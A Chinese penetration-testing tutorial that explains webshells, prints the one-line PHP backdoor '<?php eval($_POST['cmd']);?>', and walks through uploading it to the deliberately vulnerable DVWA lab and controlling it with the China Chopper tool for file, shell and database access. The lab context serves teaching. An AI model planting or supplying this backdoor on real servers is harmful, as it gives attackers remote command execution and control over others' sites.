一句话木马是Webshell的一种,那什么是Webshell?先讲讲什么是shell 。Shell是系统的用户界面,提供了用户与内核进行交互操作的一种接口 。它接收用户输入的命令并把它送入内核去执行 。因为系统内核是我们不能直接操作的,shell就给我们提供了一个接口,通过shell我们可以把命令送入到内核 。shell管理用户与操作系统之间的交互,等待你输入,向操作系统解释你的输入,并且处理各种各样的操作系统的输出结果 。
文章插图
php一句话木马
网络安全行业有一句非常有名的谚语:“一个不想获得目标站点Webshell的黑客不是一个好的黑客”,可见Webshell对一个黑客的吸引是多么的强烈,黑客在入侵了一个网站后,通常会留下一个asp或php后门文件与网站web服务器进行交互,得到一个命令执行环境,以达到控制网站服务器的目的 。这个后门文件就是所谓的webshell 。
一句话木马一句话木马作为Webshell的一种,由于这类Webshell代码比较少,往往只有一行代码,所以就被称为一句话木马 。一句话木马虽然代码简单,但是结合中国菜刀等Webshell管理工具,它们的功能却是非常的强大 。
一句话木马举例
【Web渗透测试——一句话木马与中国菜刀】下面就是一个简单的PHP语言一句话木马:
<?php eval($_POST['cmd']);?>
eval函数把字符串按照 PHP 代码来计算,该字符串必须是合法的 PHP 代码,且必须以分号结尾 。
$_POST
PHP 超全局变量 ,$_POST 用于收集表单数据(form-data) 。一句话木马会把我们通过POST方式提交的符合php代码规范的字符串当做php代码执行 。
中国菜刀这里的中国菜刀不是指切菜做饭的工具,而是中国安全圈内使用非常广泛的一款Webshell管理工具,中国菜刀用途十分广泛,支持多种语言,小巧实用,中国菜刀有三个主要功能 。
文件管理
可以访问站点所在服务器里边存储的文件,甚至可以删除、上传、下载里边的文件 。
文章插图
文件管理
虚拟终端
可以在以下命令框中执行命令,获取服务器相关信息 。
文章插图
虚拟终端
数据库管理
如果服务器上安装有数据库可以通过SQL语句查询数据库里边的数据 。
文章插图
数据库管理
下面我就演示一下如何利用一句话木马和中国菜刀来获取目标站点Webshell,首先是测试环境我们使用DVWA,我们这次选择使用虚拟机中的OWASPBWA的DVWA,打开虚拟机中的OWASPBWA运行到如下图所示:
文章插图
OWASPBWA
注意图中红框中的信息,一是:http://192.168.199.131,二是:username=root,password=owaspbwa,根据提示输入用户名root,密码owaspbwa,进入OWASPBWA虚拟机中,打开主机浏览器输入网址http://192.168.199.131,进入OWASPBWA主界面,点击图中下方红框中的链接,如下图所示:
文章插图
OWASPBWA主界面
进入到DVWA登录界面,输入username=admin,password=admin,进入DVWA,如下图所示:
文章插图
DVWA登录界面
登录DVWA后,点击左侧“upload”-浏览选择文件-点击“upload”按钮-提示“../../hackable/uploads/123.php succesfully uploaded!”表示上传成功,如下图所示,注意下图左下角“Security Level: low”,否则上传不会成功 。
文章插图
上传123.php一句话木马
然后打开中国菜刀,在空白处右键选择“添加”,出现添加SHELL窗口,在地址栏填入http://192.168.199.131/dvwa/hackable/uploads/123.php,后边小输入栏填入“cmd”,就是一句话木马中<?php eval($_POST['cmd']);?>中的POST参数,脚本类型选择PHP(Eval),字符编码为GB2312,点击添加 。
文章插图
添加shell
双击添加好的shell就可以访问目标主机OWASPBWA中的文件,你可以删除、编辑及下载里边的文件,甚至可以上传“大马”到目标主机,获得更多的权限,如下图所示:
推荐阅读
- 又一个小而美的Java Web框架:Solon
- 黑客大神教你:Weblogic相关漏洞复现
- 微软|自家设备首发:Win11测试“Voice Clarity”语音降噪功能
- Weblogic相关漏洞复现
- 工控渗透框架ISF介绍:信息收集篇
- 黑客术语介绍!web渗透小白的进阶之路
- 功能测试的一些测试意识总结
- 敏捷交付中的自动化测试
- 网页防篡改与Web防火墙的区别
- 功能测试怎么做?常用功能测试方法总结